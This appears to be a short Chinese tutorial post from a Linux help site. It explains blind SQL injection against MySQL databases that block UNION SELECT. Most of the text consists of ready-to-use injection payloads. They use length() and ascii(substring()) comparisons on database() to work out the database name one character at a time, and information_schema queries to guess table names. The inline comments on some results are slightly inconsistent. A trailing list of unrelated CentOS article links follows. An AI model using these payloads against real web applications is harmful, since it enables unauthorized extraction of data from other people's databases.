mysql不支持union select的盲注方法
添加时间:2011-3-1
添加:
admin
猜解数据库长度
and Length((database()))<10 //小于12返回正常说明数据库是12位以下
and length((database()))<8 //小于8返回错误说明数据库名是9位的
猜解数据库名
and ascii(substring((database()),1,1))=100 //100的ascii码=d,说明不是d
and ascii(substring((database()),1,1))=122 //122存在说明数据库名第一位是z
and ascii(substring((database()),2,1))=114 返回错误说明不是ascii码114=r 说明第二位不是r
and ascii(substring((database()),2,1))=115 返回正常说明第二位是s
.....
猜表
and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema=0x7A73323236315F6462 limit 0,1))<10 #小于8返回正常表示表小于10
and Length((SELECT distinct table_name FROM information_schema.tables Where table_schema=0x7A73323236315F6462 limit 0,1))>9 #大于9返回错误,表示值是9或8...
关健词:mysql
新文章:
- CentOS7下图形配置网络的方法
- CentOS 7如何添加删除用户
- 如何解决centos7双系统后丢失windows启动项
- CentOS单网卡如何批量添加不同IP段
- CentOS下iconv命令的介绍
- Centos7 SSH密钥登陆及密码密钥双重验证详解
- CentOS 7.1添加删除用户的方法
- CentOS查找/扫描局域网打印机IP讲解
- CentOS7使用hostapd实现无AP模式的详解
- su命令不能切换root的解决方法
- 解决VMware下CentOS7网络重启出错
- 解决Centos7双系统后丢失windows启动项
- CentOS下如何避免文件覆盖
- CentOS7和CentOS6系统有什么不同呢
- Centos 6.6默认iptable规则详解